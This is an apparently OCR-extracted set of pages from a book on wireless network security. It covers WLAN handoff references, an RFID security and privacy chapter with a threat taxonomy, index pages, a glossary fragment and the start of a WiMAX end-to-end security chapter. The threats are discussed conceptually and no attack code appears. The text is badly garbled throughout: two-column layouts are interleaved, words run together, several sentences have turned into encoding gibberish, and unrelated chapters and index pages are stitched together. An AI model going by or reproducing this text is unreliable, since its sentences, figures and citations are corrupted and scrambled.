handoffsbenefitfromthenonuniformasymmetric Blunk, L., Vollbrecht, J., Aboba, B., Carlson, J.,
trust model as the probability values are different & Levkowetz, H. (2003, September). Extensible
and the trust clouds improve because of the higher authentication protocol (EAP) (Internet Draft
probability value P2. draft-ietf-eap-rfc2284bis-06.txt).
0
CISCO IP Phone. CiscounifiedwirelessIPphone kEy tErMs

02 9 7 . Retrieved February 1, 2007, from http://www.
cisco.com/en/US/products/hw/phones/ps379/ FHR: A group of wireless access points in a
ps5056/index.html public access LAN to whom the predictive authen-
tication will be performed (Pack, 2002). FHR is
Hassan, J., & Landfeldt, B. (2006, June). Fast
selected by using a FHR selection algorithm, and
authentication in a collaborative wireless access
taking into account the user mobility and traffi
network. Paper presented at the IEEE International
pattern.
Conference on Communications (ICC).
Handoffs: Changing network link-layer con-
IEEE 802.1X. (2001, June). IEEE standard for local
nection from one network access point or network
and metropolitan area networks: Port based net-
port to another one.
work access control (IEEE Std. 802.1X-2001).
IEEE 802.11: Also known as Wi-Fi, this is a
IEEE 802.11i. (2004, June). IEEE 802.11i: Wireless
set of standards for WLANs from the IEEE 802
LAN medium access control (MAC) and physical
working group 11.
layer(PHY)specifications:Mediumaccesscontrol
(MAC) security enhancement. IEEE802.11i: An amendment to standard
802.11 to specify security mechanisms for Wi-Fi
Juniper Networks. Retrieved February 9, 2007,
networks.
from http://www.juniper.net/
Neighbor Graph: A collection of APs that the
Mishra, A., Shin, M. H., & Arbaugh, W. A. (2004,
mobile device is likely to handoff to in its next
February). Pro-active key distribution using
moves (Mishra, 2004).
neighbor graphs. IEEE Wireless Communications,
11(1), 26-36. Network Access Control: Used for security
purposes. Network access control determines who
Pack, S., & Choi, Y. (2002, October). Pre-au-
(or which device) to give access to the network.
thenticated fast handoff in a public wireless LAN
based on IEEE 802.1X model. Paper presented Trust Cloud: A trust cloud is a collection of
at the IFIP TC6/WG6.8 Working Conference on trust links for a given access point or residential
Personal Wireless Communications. gateway (RG) (Hassan, 2006).
Rigney, C., Willats, W., & Calhoun, P. (2000a, Trust Link: A trust link defines the trust
June). Radius extensions (IETF Internet RFC relationship between any two given RG (Hassan,
2869). 2006).
Rigney, C., Willats, S., Rubens, A., & Simpson, W. Wireless Networks: Networks (of computers)
(2000b, June). Remote authentications dial in user that allow network nodes (e.g., user devices) to
service (RADIUS) (IETF Internet RFC 2865). connect to the network infrastructure without any
wire, typically using short range radio.
WLANs: Wireless local area networks. Local
area networks that allow every computer to use a
wireless LAN card with which it can communicate
with other systems.

5
EndnotEs In this section, RG, AP and wireless rout-
ers can be treated equally to mean wireless
1
Typically, the overall latency of handoffs AP-type devices not belonging in the same
should not exceed 50ms. domain, but to different domains.
6
2
For IEEE 802.11b, the coverage range is no In the interdomain handoff model, especially
more than 100-200 feet, as compared to the the trust-cloud model, the APs (or residential
cellular coverage area in cities which is around gateways-RGs, in the case of community
2640 feet, and more in the rural areas. networks) belong to different owners, and
3
Airespace later was acquired by Cisco Systems domains. APs and RGs are also used inter-
(Cisco Systems Web site) changeably here.
4
Funk Software has now been acquired by Lh
7
L= , where Lh and Ll are the mean values
Juniper Networks (Juniper Networks) Lh + Ll
for the sojourn times in the heavily and lightly
loaded states, respectively.

Chapter XLV
Security and Privacy in RFID
Based Wireless Networks
Denis Trček
University of Ljubljana, Slovenia
AbstrAct
Mass deployment of radio-frequency identification (RFID) technology is now becoming feasible for a
wide variety of applications ranging from medical to supply chain and retail environments. Its main
draw-back until recently was high production costs, which are now becoming lower and acceptable. But
due to inherent constraints of RFID technology (in terms of limited power and computational resources)
these devices are the subject of intensive research on how to support and improve increasing demands for
security and privacy. This chapter therefore focuses on security and privacy issues by giving a general
overviewofthefield,theprinciples,thecurrentstateoftheart,andfuturetrends.Ani
fieldofsecurityandprivacysolutionsforthiskindofwirelesscommunicationsisdesc
IntroductIon tags. Due to the ability to currently store up to two

kilobytes of data on these tags, they constitute a
Radio-frequency identification (RFID) has veryits
attractive technology in many areas. These
rootsinWWIIwhenitwasusedforthefirst time
include manufacturing, supply chain management,
to distinguish British from German aircrafts. An inventory management, healthcare applications,
aircraft was challenged to communicate a certain air-transportation, and so forth. All items (in con-
piece of information and on this basis a decision tainers) can be scanned together, while each item
was made on whether to attack it or not. canbeuniquelyidentifiedandtraced. - Theseproper
This principle is the core of contemporary RFID ties give RFIDtechnology significant advantages
technology, although, of course, the implementa- over existing bar-code systems that currently serve
tiontechnologyissignificantlydifferent. for lowIt isnow
level, operational acquisition of data in the
based on low-cost integrated circuits (ICs) called above mentioned business environments.
Security and Privacy in RFID Based Wireless Networks
These appealing properties also have draw- A model of RFID environment is described in
backs, many of them in the area of security and Figure 1. It consists of tags (also called respond-
privacy.ButasRFIDisalreadyfindingitsers) place
and readers (also called transceivers). This is
in contemporary information systems (ISs), these the front-end of RFID applications, which have
issues need to be addressed seriously, which is the their back-end in database management systems,
goal of this chapter. In the second section, the back- where they are integrated with the rest of the IS
ground of RFID technology is given. In the third (see Figure 1). It is generally assumed that RFID
section, threats are described and countermeasures security and privacy is concerned with the front-
are given. In the fourth section anticipated future end part (the left-hand side of the dashed vertical
trends are discussed. There is a conclusion in the line in Figure 1). This is actually the part that is
fifthsection,whilethechapterendswith references
covered by the reader’s signal; the tag’s signal
andkeydefinitions. usually falls within its range.
Tags consist of a microchip and an antenna,
both encapsulated in polymer material. The micro-
bAckground ovErvIEw chip has encoded data, called identification (ID),
which typically include the manufacturer, brand,
Somedefinitionshavetobegivenfirst.One basic
model, and serial number. Communication takes
definitionintheareaofcomputercommunications) ( place on radio-frequencies, for example, from 125
security states that security means minimization kHz to 134 kHz for security cards and from 800
of vulnerabilities of assets and resources (ISO, MHz to 900 MHz for retail applications (Roussos,
1989). Wireless security thus means minimization 2006). However, increasing the frequency means
of vulnerabilities of assets and resources when increased accumulation of signal in bodies contain-
communicating information in electro-magnetic ing large quantities of water or in metal.
media through a free-space environment. Finally, Communication is achieved by electromagnetic
RFID technology will be defined as wireless coupling between readers and tags. A reader trans-
identificationtechnologywhichoperates onradio
mits a signal, which induces a voltage in the tag’s
frequencies and deploys low-cost ICs. antenna. This couplingprovidessufficientpower
Figure 1. A model of the RFID security and privacy environment
RFID RFID back-end

tag reader information
system
tag's range
SECURE ENVIRONMENT
reader's range

for a tag to respond (after performing some cal- 200 read operations per second. An algorithm to
culations if required). If a tag is powered through respond to read primitives from a reader may be
this coupling, it is called a passive tag. However, probabilistic (e.g., Aloha (Prasad & Rugierre, 2003)
if a tag has some source of energy, for example, or deterministic (e.g., a binary walking tree) (Juels,
a battery, it is called an active tag. Each type has Rivest, & Szydlo, 2003). With such algorithms, a
certain advantages and disadvantages. Passive tags singletagcanbeidentifiedandisolated.Therelat
are cheap, but remain active until being explicitly process is called singulation. Finally, the number
destroyed. They have a low operating perimeter of available gates that can be devoted to security
(typically 3 meters) with a relatively high error rate. operations is in the range of 400 to 4,000.
In contrast, active tags have a greater operating Theaboveestimatesarebasedonfiguresfrom
perimeter (up to a few hundred meters), lower er- Weis (2003) by applying Moore’ s law, which states
ror rate, and cease functioning when the source of that for the same price the available processing
powerisexhausted.However,theyaresignificantly power doubles every year and a half. It is therefore
more expensive. Both kinds of tags can be read clear that processing resources to support secu-
only, write once-read many, or rewritable. rity in RFID environments are very limited and
The main barrier to mass-deployment of RFID lightweight cryptographic solutions thus provide
tagsistheirprice.Awish-priceislimited byfive
an answer to this problem.
cents, but depending on quantities and using current Moore’s law also implies that there is always a
technologies, many application niches can already point where “ordinary” cryptographic algorithms
be covered. The total cost consists mainly of cost become feasible for computationally weak devices.
of an antenna, which can be from €/ US$1 to 0. An example of a thick RFID implementation, which
€/ US$ 20,. cost of silicon, and IC production;is based on AES to provide authentication, can be
silicon typically costs €/ US$2mm 0/4. (Weis, found in the work of Feldhofer, Dominikus, and
2003), while IC production depends on the number Wolkerstorfer (2004). Despite this, a permanent
of logical gates, that is, technology. But roughly, need exists for lightweight cryptographic protocols
thecostrangesfrom€/ US$mm / 5 20 . 2
with 1500 and also algorithms. One main reason is the gap
gates/mm2to€/ US$mm / 80 . 2
with 60.000 gates between ordinary devices where space and power
(Weis, 2003). consumption are not a serious concern (e.g., tag
A typical communication channel with a pas- readers, desktop systems), and weak devices with
sive RFID is asymmetric. This means that forward limited space and power consumption (e.g., RFID
communication, that is, communication from a tags, smart-cards). This gap means that increased
reader to a tag, has one order of magnitude larger processing power affects both kinds of devices
in range than backward communication, that is, equally; in the case of a cryptographic algorithm,
from the tag to the reader. In the former case this the key-length of this algorithm is extended.
is typically up to 100 meters, while in the latter As a consequence, weak devices are again less
case this is typically up to 3 meters. The reason, protected because they cannot deploy such inten-
of course, is the power consumption constraint, sive computations with enlarged keys. Further, if
which means that practical applications are limited the above use of a cryptographic algorithm can be
to a range of up to 3 meters. seen as a kind of variable cost (the longer the key,
Thus, the cost factor dictates that a typical RFID, the higher the processing overhead), cryptographic
or a reference RFID implementation, is currently protocolscanbeseenasafixedcost.Note - thatcryp
expected to have the following characteristics. It tographic protocols are ordinary communication
is passively powered and has 96 bits of read-only protocols that deploy cryptographic algorithms,
memory. These standardized bits serve to carry the and cryptographic protocols are often referred to
tag’s identity, which is unique for each tag (these as security services, while cryptography algorithms
IDs are stored in silicon by an imprinting process). are referred to as security mechanisms. Both kinds
A chip operates at 20,000 clock cycles, providing of costs contribute to the total processing power

requirements, and have to be kept low while at the estimated damage D(ai, tj) caused by interaction
same time enabling a comparable level of security between asset ai and threat tj during this period is
to weak devices. This leads to a whole new research calculated. The result presents the upper bound for
area (Juels, 2004). investment in safeguards. A certain degree of risk,
called residual risk, is usually accepted and taken
rfId threats and countermeasures into account. This often makes sense economi-
cally. But in the majority of cases, a threat cannot
The very basic threat to each and every tag is that becompletelyneutralized(Trček,.026)
it remains active when it is no longer supposed to The challenging parts of this process are
be active. To counter this problem, RFID logic identificationofthreatsandtheirprobabilit
may implement kill operation, which means that identification of threats in RFID environments a
upon receipt of a certain communication primitive, comprehensive taxonomy from Garfinkel, Juels,
the tag becomes permanently inoperative by, for andPappucan ) 05 2 ( beused.Thefirstfourthreats
example, blowing a fuse in its circuitry. A more are related to corporate security, and the rest to
bullet-proof solution is exposure of RFID to micro- personal privacy:
wave radiation that melts its metalized layer.
Risk management drives each and every pro- • Corporate espionage threat: Tagged prod-
vision of security and privacy in ISs. A typical ucts may enable remote acquisition of supply
process is depicted in Figure 2. It starts with the chain details like logistics details, volumes,
identificationof A assets
(A = {a1, a2, …, an}) and and so forth.
threats T (T = {t1, t2, …, tm}) to those assets. For • Competitive marketing threat: Tags may
each asset and threat, that is, Cartesian product A enable access to customers’ preferences and
× T = {(a1, t1), (a1, t2), …, (an, tm)}, related vulner- use the data gathered for competition.
abilitiesareidentifiedtogetherwith • the likelihood
Infrastructure attacks threat: Where
of a threat to get into interaction with the asset RFID is central to a competitor’s advantage;
during a certain period of time. On this basis, the disruption of RFID operations becomes an
important point for attack.
Figure 2. Risk management process

• Trust perimeter threat: Gathering addition- may be used for smart-home applications or to
al volumes of data through RFID introduces help disabled people.
new challenges related to sharing information The most common approach to security and
in a trustworthy way. privacy is by deploying cryptography. Using
• Action threat: Individuals actions may be cryptographic mechanisms (e.g., symmetric and
monitored. asymmetric cryptographic algorithms, strong one
• Association threat: When tagged products way hash functions), the following cryptographic
are associated with an individual’s ID (e.g., services can be implemented (ISO, 1995):
loyalty programs), these persons can be as-
sociated not only with the type of product, • Authentication: This ensures that the peer
but with the exact product, due to its unique communicating entity is the one claimed.
ID. • &RQ¿GHQWLDOLW\ This prevents unauthorized
• Location threat: Tags can be triggered by disclosure of data.
covert readers at various locations to reveal • Integrity:7KLVHQVXUHVWKDWDQ\PRGL¿FDWLRQ
a person’s location. insertion, or deletion of data is detected.
• Preference threat: Tags disclose preferences • Access control: This enables authorized use
of customers and help to identify, for example, of resources.
more wealthy ones. • Nonrepudiation: This provides proof of
• Constellation and transaction threats: Con- origin and proof of delivery, such that false de-
stellation threat is similar to location threat, nying of the message content is prevented.
but in this case the identity of a customer is • Auditing: This enables detection of suspi-
not known. Despite this, a particular person cious activities and analysis of successful
can be spotted and traced. Further, chaining breaches. It provides evidence when resolving
one constellation threat with another, a whole legal disputes.
chain of actions, or transactions, becomes
traceable. ,QFDVHRI5),’WDJVDXWKHQWLFDWLRQFRQ¿GHQ -
• Breadcrumb threat: When products are tiality, and access control can be applied to counter
disposed with their original tags, an attacker threats described at the beginning of this section.
PD\XVHWKHPDQGLVWUDFNHGZLWKIDOVL¿HG But to make these security services operational,
identity. This is actually just another kind of key management (i.e., handling of cryptographic
identity theft. DOJRULWKPV¶NH\VKDVWREHUHVROYHG7UHN
This is a complex issue in open environments
On top of all this, a fundamental threat exists, and has been known as such for almost two de-
called tag cloning, and such cloning has been suc- FDGHV6XI¿FHLWWRVD\WKDWRQO\YHU\VLPSOHNH\
FHVVIXOO\GHPRQVWUDWHG%RQR*UHHQ6WXEEOH¿HOG management schemes are acceptable for RFID
Juels, Rubin, & Szydlo, 2005). What countermea- environments.
VXUHVDUHDWRXUGLVSRVDO" With regard to security and privacy, it is re-
The basic option was mentioned at the begin- quired that authentication, and consequently access
ning with the physical destruction of a tag (e.g., control, is provided only to legitimate readers.
by exposure to microwaves or implementation of a Further, rogue readers should not be disclosed a
logical kill command that makes chip inoperable). tag’s ID, but should also be prevented from trac-
But the fact is that the latter approach often has ing a tag, regardless of the inaccessibility of its
DZVLQLPSOHPHQWDWLRQVORJLFDOO\NLOOHGWDJVPD\ ID. Put another way, when rogue readers interact
remain active or be reactivated (Roussos, 2006). with a tag, it should be practically impossible (i.e.,
,QPDQ\VLWXDWLRQVLWPLJKWEHHYHQEHQH¿FLDOWR FRPSXWDWLRQDOO\ GLI¿FXOW WR OLQN WKH PXOWLSO
keep these tags active; for example, tagged items manifestations of a tag to this very tag.

Index
packet radio network (PRNET) 640 (PEAP) 777

packet switch (PS) 298 protocol environments 211
packet switched (PS) 321 proxy call session control function (P-CSCF)
pair-wise maser key (PMK) 714 343
pair-wise master key (PMK) 702 pseudo-random number generator (PRNG) 698
pairwise transient key (PTK) 304 pseudonyms, and identity 120
passive tag 725 public-key cryptography 571
password authentication 195 public-key cryptography (PKC) 612
password authentication protocol (PAP) 160, public access wireless networks (PAWNs) 285
779 publickeycertificates 205(PKC)
path key establishment 645 public key infrastructure (PKI) 256, 386, 484,
peer-to-peer (P2P) network, and security 485, 766, 781
95–103 public key interface (PKI) 388
peer-to-peer paradigm (P2P) 438 public land mobile network (PLMN) 298, 367
peer intermediaries for key establishment public land mobile networks (PLMN) 273
(PIKE) 491 public switched telephone network (PSTN)
perfect forward secrecy (PFS) 290 284
perimeter security (PS 373
personal area network (PAN) 13, 148, 396 Q
personal area networks (PAN) 277 quality of protection (QoP) 240
point-to-point protocol (PPP) 777 quality of service (QoS) 105, 240, 280, 344,
policy decision points (PDP) 282 500, 766
policy enforcement points (PEP) 282
polynomial share 645 R
port access entity (PAE) 701
radio-frequencyidentification 723 (RFID)
power control 652
radio access network (RAN) 340
presence and availability working Group (PAG)
radio access networks (RANs) 277
389
radiofrequencyfingerprinting 84 (RFF)
presence and availability working group (PAG)
radio network controller (RNC) 320, 340, 365,
390
763
pretty good privacy (PGP) 483
radio network service node (RNSN) 376
Privacy 209
RADIUS protocol 196
privacy 115
random challenge (GPRS-RAND 355
privacy, and authentication 14
random number (RAND) 322
privacy, and authorization 14
reactive routing protocols 640
privacy, and security 14
registration authority (RA) 486
privacy, and trust 14
related signed response (GPRS-SRES) 355
privacy-enhancing techniques 115–128
relative neighborhood graph (RNG) 656
privacy key management (PKM 201
remote authentication dial in user service (RA-
privacy key management for extensible authen-
DIUS) 14, 158, 776
tication protocol (PKM-EAP) 373
removable user identity module (R-UIM) 388
privacy preserving routing (PPR) 441
repeater stations (RSs 201
privacy protection 116
replay attack 419
proactive key caching (PKC) 716
reputation mechanisms 417
probabilistic forwarding (PFR) 642
request-to-send (RTS) 418
protected EAP (PEAP) 375
residential gateways (RG) 711
protected extensible authentication protocol
rfmon 63

Index
roaming agreements 281 security, tamper resistant storage 148

Ron’s Cipher #4 (RC4) 240 Security Architecture 766
round trip times (RTT) 275 security architecture 760
roup temporal key (GTK) 702 security association (SA) 398
router advertisement (RA) 398 securityassociationidentifier 766 (SAID)
route reply (RREP) 435 security attacks 481
route request (RREQ) 419, 435 security gateways (SEGs) 325
routing area identity (RAI) 354 security goals 481
security mechanisms 725
S security parameter establishment (SPE) 438
scanning, passive 81 Security Parameter Index (SPI) 202
second-generation (2G) 339 security protocol 764
second generation (2G) 274, 319, 351 security protocols 776
second hand information (SHI) 610 Security Service 731
secure ad hoc distance vector (SAODV) 522 security services 725
secureandefficientkeymanagement(SEKM) security sublayer 750
510 self-organized CA (SOCA) 510
secure AODV (SAODV) 420 self-protection problem 660
secure communication 779 semantic access control policies 469
secure directed diffusion (SDD) 644 semantic context-driven access control 467
secure distributed anonymous routing protocol sensor applications 652
(SDAR) 439 sensor coverage 652
secureefficientadhocdistancevector sensor network 568, 652
routing
protocol (SEAD) 420 sensor protocols for information via negotiation
secure hash algorithm-1 (SHA-1) 257 (SPIN) 642
secure network encryption protocol (SNEP) service-oriented 280
603 service contract 281
secure positioning for sensor networks (SPINE) service discovery and advertisement (SDA) 11
572 service orientation 11
Secure routing 588 service provider 57–58
secure routing protocol (SRP) 420, 451, 488 service provider networks (SPNs) 281
secure service discovery 11–27 service providers 281
secure socket layer (SSL) 198, 239, 364, 373 services 281
secure transient association 422 servicesetidentification 289 (SSID)
secure user plane location (SUPL) 390 service set identifier (SSID)detection
81
security, and multimedia watermarking 239 serving call-session-control-function (S-CSCF)
security, authentication 189 381
security, black-box 30 serving call session control function (S-CSCF)
security,firewall95–103 issues 343
security, infrastructure-based 15 Serving GPRS support node (SGSN) 299
security, in home networks 184 serving GPRS support node (SGSN) 320, 341,
security, in wireless environment 183 368
security, P2P 95–103 serving GSN (SGSN) 352
security, requirements in wireless environments serving network (SN) 319, 355
79 Session hijack 783
security, smart space dependent 18 session initiation protocol (SIP) 340

Index
session MAC 632 temporary mobile subscriber identities (TMSI)

shared key authentication (SKA) 697 763
shared key discovery phase 645 temporary mobile subscriber identity (TMSI)
short message service (SMS) 274, 380 199, 354
signaling system 7 (SS7) 356 third generation (3G) 318
Signalling System 7 (SS7) 180 threat protection system (TPS) 373
signed response (GPRS-SRES) 355 three-party key-distribution (3PKD) 217
single sign-on 55–56 ticket granting server (TGS) 200
single sign-on (SSO) protocol 178 time-to-live (TTL) 557
sink hole attack 644 time division-sychrononous CDMA (TD-SCD-
skinny tree (STR) 495 MA) 339
sleep deprivation attack 643 time division multiple access (TDMA) 273,
Sleeper protocol 18 641, 767
smart card 153 time division multiplex (TDM) 683
sniffing81 topologically-inspired attack 643
software agent 28 topology 654
spoofing82 topology control 652
Sprite 421 topology design 661
SSRD protocol 19 total access communication system (TACS)
Static keying 645 273
stationary secure database (SSD) 540 TRAFFIC 422
Statisticen-routefilteringmechanism (SEF) 130
traffic
630 transmission control protocol (TCP) 162
subscriber identity module (SIM) 353, 354, transport encryption key (TEK) 766
380, 783 transport layer security (TLS) 328, 364, 386,
subscriberstatefulfirewall 372 (SSF) 711, 712, 752, 767
subscriber station (SS) 766 transport layer security (TLS) protocol 162
support of the current serving GSN (SGSN) tree-basedgroupDiffie-Hellman(TGDH) 494
763 triple data encryption standard (3DES) 240
Sybil attack 444, 644 Trojan horse, Drever 5
Symmetric cryptography 575 Trojan horse, Locknut 5
system-on-chip design 256 Trojan horse, Skuller 5
system architecture evolution (SAE) 391 trust,definitionandprinciples 464
system design 652 Trust Cloud 721
trust context 646
T trusted third party 56–57
tag’s identity 725 trusted third party (TTP) 423, 483
tags 723 Trust Link 721
tatisticen-routefiltering 634 (SEF) trust management 190, 461, 464, 636
telecoms & Internet converged services & pro- trust management, advances in 191–192
tocols for advanced networks (TISPAN) trust management, systems 465
390 trust models 484
temporal key integrity protocol (TKIP) 304, trust packet acknowledgment (TPA) 648
700, 780, 784 trust packet precision (TPP) 648
temporary identities (TMSI, TLLI) 360 tunneled TLS (TTLS) 375
temporary logical link identity (TLLI) 354
10
Index
U visiting mobile nodes (VMNs) 396

visitor location register (VLR) 352, 763
ubiquitous and robust access control (URSA) visitors 281
488 voice over IP (VoIP) 176, 368
UC security model 211
UMTS integrated circuit card (UICC) 327 W
UMTS subscribers identity module (USIM)
300 war driving 131
UMTS terrestrial radio access network wardriving, wireless 61–77
(UTRAN) 320 watermarking 32
universal integrated circuit card (UICC) 381 watermarking, and imperceptibility 238
Universal mobile telecommunications system watermarking, and security 238
(UMTS) 339, 763 watermarking, in wireless environment 236–
universal mobile telecommunications system 255
(UMTS) 146, 299, 759, 760 watermarking, lightweight 246
universal mobile telecommunication system watermarking algorithm, for wireless multime-
(UMTS) 318 dia 245
universal SIM (USIM) 380 web-of-trust model 486
user-oriented design 280 Web services (WS) 384
user datagram protocol (UDP) 309 Wi-Fi protected access (WPA) 132, 697, 699,
user equipment (UE) 340, 382 761, 784
users 281 Wi-Fi security protocol 766
user service identity module (USIM) 321 wideband code division multiple access (W-
user terminal (UT) 340 CDMA) 275
USIM application toolkit (3GPP TS 33.111, wideband code division multiple access (WCD-
2001) 327 MA) 320
WiFi network 291
V wired equivalence privacy (WEP) 780
wired equivalent privacy (WEP) 131, 240, 761
vehicular ad hoc networks (VANET) 450, 457 wireless access gateway (WAG) 298
vehicular area network (VAN) 396 wireless application layer (WAL) 284
verifiablemultilateration 571 (VM) wireless application protocol (WAP) 298, 368
vertical handover 286 wireless area network (WAN) 13
very large-scale integration (VLSI) 256, 274, wireless environment, multimedia encryption
364 and watermarking 236–255
VHSIC hardware description language (VHDL) wireless interface 62–77
265 wireless intrusion detection system (WIDS) 78
video encryption algorithm (VEA) 242 wireless intrusion tracking system (WITS) 88
video object plane (VOP) 242 wireless LAN (WLAN 346
video on demand (VoD) 176 wireless LAN (WLAN) 210, 240, 272
virtual operators (VOs) 281 wireless LANs (WLANs) 297
virtual private network (VPN) 198, 282, 300, wireless MAC security 417
357, 373, 747, 768 wireless metropolitan area networks (WMAN)
virtual private networks (VPNs) 198, 324 347
virutal backbone 656 wireless metropolitan area networks (WMANs)
visiting location register (VLR) 347 760
Visiting Mobile Node (VMN) 403
11
Index
wireless multimedia, and encryption algorithms wireless transport layer security (WTLS) 328,
239 368
wireless multimedia, and watermarking algo- wireless wardriving 61–77
rithms 245 wireless wide area network (WWAN) 347
Wireless network 209 WLAN 721
wireless network 189 WLAN-access gateway (WLAN-AG) 298
wireless network, and authentication 193 WLAN-access point name (W-APN) 299
Wireless Networks 721 WLAN authentication and privacy infrastruc-
wireless networks, and security challenges 130 ture (WAPI) 210
wireless networks, and threats in 79 worldwide interoperability for microwave ac-
wireless networks, and vulnerabilities 129–144 cess (WiMAX) 776
wireless networks, channel jamming 130 worm, Cabir 4
wireless networks, illicit use of 81 worm, Mabir 5
wireless networks, intrustion and anomaly wormhole attack 419, 644
detection in 78–94 wormhole attacks 648
wireless networks, passive scanning 81
wirelessnetworks,serviceset- identifier X detec
tion 81 XMLconfigurationaccessprotocol(XCAP)
wirelessnetworks,sniffing81 391
wirelessnetworks,spoofing82 XML document management (XDM) 390
wirelessnetworks,traffic 130analysis
wireless networks, unauthorized access 130 Y
wireless routing protocols 504
Yao graph (YG) 656
Wireless security 724
Wireless Sensor Network (WSN) 209 Z
Wireless sensor networks (WSN) 628
wireless sensor networks (WSN) 617 zone-based IDS (ZBIDS) 425
wireless sensor networks (WSNs) 565
wireless service access, and identity manage-
ment 104–114
12
Security and Privacy Approaches for Wireless Local and Metropolitan Area Networks (LANs & MANs)
Medium Access Control (MAC): The function (IETF) that set standards and are voluntarily fol-
in IEEE networks that arbitrates use of the network lowed by many makers of software in the Internet
capacity and determines which stations are allowed community.
to use the medium for transmission.
Wireless Application Protocol (WAP): A
MPDU: MAC protocol data unit is a fancy standard for providing cellular telephones, pagers,
name for frame. The MPDU does not, however, and other handheld devices with secure access
include PLCP headers. to e-mail and text-based Web pages. Introduced
in 1997 by Phone.com, Ericsson, Motorola, and
MSDU: MAC service data unit is the data ac-
Nokia, WAP provides a complete environment
cepted by the MAC for delivery to another MAC on
for wireless applications that includes a wire-
the network. MSDUs are composed of higher-level
less counterpart of TCP/IP and a framework for
data only. For example, an 802.11 management
telephony integration, such as call control and
frame does not contain an MSDU.
telephone book access. WAP features the wireless
OFDM: Orthogonal frequency division multi- markup language (WML), which was derived from
plexing is a technique that splits a wide frequency Phone.com’s HDML and is a streamlined version
band into a number of narrow frequency bands of HTML for small-screen displays. It also uses
and inverse multiplexes data across the subchan- WMLScript, a compact JavaScript-like language
nels. Both 802.11a and the forthcoming 802.11g that runs in limited memory. WAP also supports
standards are based on OFDM. handheld input methods, such as a keypad and voice
recognition. Independent of the air interface, WAP
Open Systems Interconnection (OSI): A runs over all the major wireless networks in place
baroque compendium of networking standards now and in the future. It is also device-indepen-
that was never implemented because IP networks dent, requiring only a minimum functionality in
actually existed. the unit to permit use with a myriad of telephones
Request for Comments (RFC): A series of and handheld devices.
numbered documents (RFC 822, RFC 1123, etc.),
developed by the Internet Engineering Task Force

Chapter XLVII
End-to-End (E2E) Security
Approach in WiMAX:
A Security Technical Overview for
Corporate Multimedia Applications
Sasan Adibi
Gordon B. Agnew
Tom Tofigh
WiMAX Forum, USA
AbstrAct
An overview of the technical and business aspects is given for the corporate deployment of services
over worldwide interoperability for microwave access (WiMAX). WiMAX is considered to be a strong
candidate for the next generation of broadband wireless access; therefore its secur
chapterprovidesanoverviewoftheinherentandcomplementarybenefitsofbroadbandde
a long haul wireless pipe, such as WiMAX. In addition, we explore end-to-end (E2E) security structures
necessary to launch secure business and consumer class services. The main focus of this chapter is to
look for a best security practice to achieve E2E security in both vertical and horizontal markets. The E2E
security practices will ensure complete coverage of the entire link from the client (user) to the server. This
is also applicable to wireless virtualprivatenetwork(VPN)applicationswherethetunnelingmec
between the client and the server ensures complete privacy and security for all users. The same idea
for E2E security is applied to client-server-based multimedia applications, such as in Internet protocol
(IP)multimediasubsystem(IMS)andvoiceoverIP(VoIP)wheresecureclient/servercommunicatio
required. In general, we believe that WiMAX provides the opportunity for a new class of high data rate
symmetric services. Such services will require E2E security schemes to ensure risk-free high data-rate
uploads and downloads of multimedia applications. WiMAX provides the capability for embedded security
functionsthroughthesecurity 802.16 architecturestandards.IEEEis 802.16 furthersubcategorize
End-to-End (E2E) Security Approach in WiMAX
802.16d(fixed-WiMAX)and802.16e(mobile-WiMAX)Due
. tothemobilityandroamingcapabilitiesin
802.16eandthefactthatthemediumofsignaltransmissionisaccessibletoeveryone,there
extrasecurityconsiderationsappliedto802.16e.Theseextrafeaturesinclude:privacykeyma
version 2 (PKMv2), PKM-extensible authentication protocol (EAP) authentication method, advanced
encryptionstandard(AES)encryptionwrapping,andsoforth.Thecommonsecurityfeaturesof802.16d
and802.16earediscussedinthischapter,aswellasthehighlightsofthesecuritycomparison
other broadband access, third-generation (3G) technologies, and WiMAX.
IntroductIon to the physical limitations of wired technologies.

WiMAX, on the other hand, is a wireless tech-
The E2E security structure is transparent from nology with very high bandwidth for voice/data
the user’s point of view and requires dedicated applications, which does not appear to have any of
overhead and processing power. In the case of Wi- the downsides of the wired technologies. WiMAX
Fi, the overhead is a relatively large percentage of also has advantages over Wi-Fi technology in
the total bandwidth, which makes Wi-Fi infeasible terms of longer range and larger bandwidth. This
for most E2E security structures. However, in allows WiMAX to support a variety of broadband
worldwide interoperability for microwave access services.
(WiMAX), the security overhead is nominal and Wi-Fi technology was not suited for personal
may not be an issue. broadband services due to a number of limitations,
Today’s enterprise customers are forced to use especially security. WiMAX, on the other hand,
dedicated physical circuits such as leased lines to enjoys an all-IP open platform infrastructure with
realize business class E2E security. With inher- the benefit of its inherent security functions a
ent WiMAX security features, a secured virtual features. This allows for faster and inexpensive
private network (VPN) can easily be achieved provisioning of E2E secured services based on open
over public networks. Instead of such dedicated standards.InadditionWiMAXcanbeconfigured
leased line circuits, WiMAX users could enjoy for self-installed services of multimedia VPN with
VPN connectivity with up to 10 Mbps bandwidth enhanced end-to-end user control signalling.
to access the public backbones. The security aspect of WiMAX is an impor-
Personal broadband access technologies have tant issue: this includes state-of-the-art security
undergone many challenges, one of which was mechanisms, such as very strong authentication
digital subscriber line (DSL). DSL is a high-speed with per station keys and higher-level security
connection that utilizes the same wiring system mechanisms. WiMAX’s security strength is nor-
as a regular telephone line uses. The advantages mally found in add-on products, such as in wired
of DSL include: voice/data on the same line and VPNs and virtual local area networks (VLANs),
higher data rates than regular modems. There which are usually built into each of the WiMAX’s
are, however, a few downsides to DSL, includ- base stations (BSs).
ing distance dependence (between users and the This chapter will present the characteristics of
service provider) of data rate, unbalance rates for WiMAXsecurityandhowitfitsintobothconsumer
uploading and downloading of data, and having and business class structures. We believe that
no complete physical area coverage. strong E2E security can be achieved with WiMAX
All of the downsides of DSL technology appear without compromising performance.
in other personal broadband products. This is due

why wireless networks could not Without WEP, a network can be accessed by any
Provide the required security anyone. Even with WEP enabled, a network is not
considered to be secure nowadays.
There were two main reasons why wireless was
never considered as a secured high-performance Problem #4: Performance and Service Con-
backbone option for business and corporate appli- straints
cations.Thefirstissuewasthebandwidth - 802.11blimita
and 802.11g both have limited transmission
tions of wireless links and the second issue was capacities (11 and 54 Mbps) and due to MAC-layer
the high security requirements of VPNs and IMS overhead, the actual effective throughput is close
applications. The 802.11-based systems have an to half of that rate. In addition, bandwidth is not
upper limit on bandwidth of 54 Mbps for 802.11g, guaranteed.
however in real-world applications, this rate seldom
tops more than 20-25 Mbps due to the overhead Problem #5: MAC Spoofing and Session Hi-
in the medium access control (MAC) layer. It is jacking
